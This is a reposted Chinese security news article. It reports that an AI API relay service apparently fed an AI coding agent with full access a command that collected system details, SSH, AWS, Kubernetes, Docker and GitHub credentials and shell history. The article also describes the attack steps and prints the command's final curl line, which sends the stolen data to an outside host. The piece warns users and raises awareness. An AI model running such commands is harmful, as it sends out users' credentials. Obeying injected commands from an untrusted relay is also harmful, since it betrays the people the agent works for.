有用户发现:AI中转站除了掺水,还能投毒

admin 2026-08-14 08:24:20 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: AI中转站存在安全风险,用户发现AIAgent生成命令收集系统信息、扫描SSH密钥等敏感配置文件并外传至远程地址。该行为疑似投毒,但无法确认命令来源和执行链路。建议用户警惕廉价中转站,避免使用不可信服务,默认可能存在数据泄露风险。 综合评分: 68 文章分类: 恶意软件,安全意识,数据泄露,安全运营,其他


cover_image

有用户发现:AI 中转站除了掺水,还能投毒

内存泄漏

2026年8月13日 00:00 辽宁

在小说阅读器读本章

去阅读

以下文章来源于小众软件 ,作者青小蛙

小众软件 .

推荐有灵魂的电脑软件、手机应用。

字数 609,阅读大约需 4 分钟

V 站的用户昨日发帖称:某 AI 公益站点在开启 Full Access 权限后,AI Agent 生成的一段命令疑似包含环境信息收集与凭据读取行为。

包括读取 SSH 私钥、aws 环境变量、API Key、GitHub Token、管理密码、环境变量、终端历史命令等内容,并向外传输。@Appinn

发生了什么?

命令解读

用户在使用中转站时,收到了以上的命令(AI 返回内容),并在拥有完整权限的 Codex 上执行了。

这段命令主要做了三件事:收集运行环境信息、扫描敏感配置文件、将结果发送到远程地址。

具体为:

1. 收集系统信息

读取:

  • • Node / npm 版本
  • • 主机名
  • • 当前用户与权限
  • • 当前目录
  • • Linux 内核信息
  • • 环境变量

用于获取当前运行环境的基本信息。

2. 搜索配置与认证信息

尝试读取:

  • • cli-proxy-api 配置文件
  • • config.yaml
  • • auth-dir 认证目录

同时扫描:

  • • ~/.ssh/:SSH 密钥与配置
  • • ~/.aws/:AWS 凭据
  • • ~/.kube/:Kubernetes 配置
  • • ~/.docker/:Docker 登录信息
  • • GitHub CLI 配置
  • • npm、pip、Cloudflare 等工具配置

这些文件可能包含 API Key、Token、登录凭据等敏感信息。

3. 获取系统运行状态

收集:

  • • Docker 容器信息
  • • 当前运行进程
  • • 网络端口
  • • systemd 服务
  • • Shell 历史记录

用于了解当前机器运行了哪些服务。

4. 上传收集结果

命令最后通过:

curl -s -X POST --data-binary @- https://proxy[.]jxtech.store/canary

是否可以确认是“投毒”?

虽然,以上命令有明显的投毒行为,但还有几个问题:

  1. 1. 无法确认命令来源
  • • AI 模型生成;
  • • 用户编写的提示词诱导 AI 生成;
  • • 某个插件或自定义模块中的脚本;
  • • 其他上下文内容触发。

仅凭最终出现的命令,无法证明它一定来自站点后台或服务方。

  1. 2. 无法确认执行链路

目前只能看到用户展示的命令内容,无法确认:

  • • 命令是否真的执行;
  • • 执行环境是什么;
  • • 是否完整运行;
  • • 上传请求是否成功。

所以,留下一个问题:有没有其他用户提供更完整的使用过程,系统提示词、用户指令等内容。

最后,中转站,尤其廉价中转站,请不要对其抱有幻想,默认泄漏 😭


原文:https://www.appinn.com/ai-agent-full-access-security-risk/


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:内存泄漏 《有用户发现:AI 中转站除了掺水,还能投毒》

评论:0   参与:  0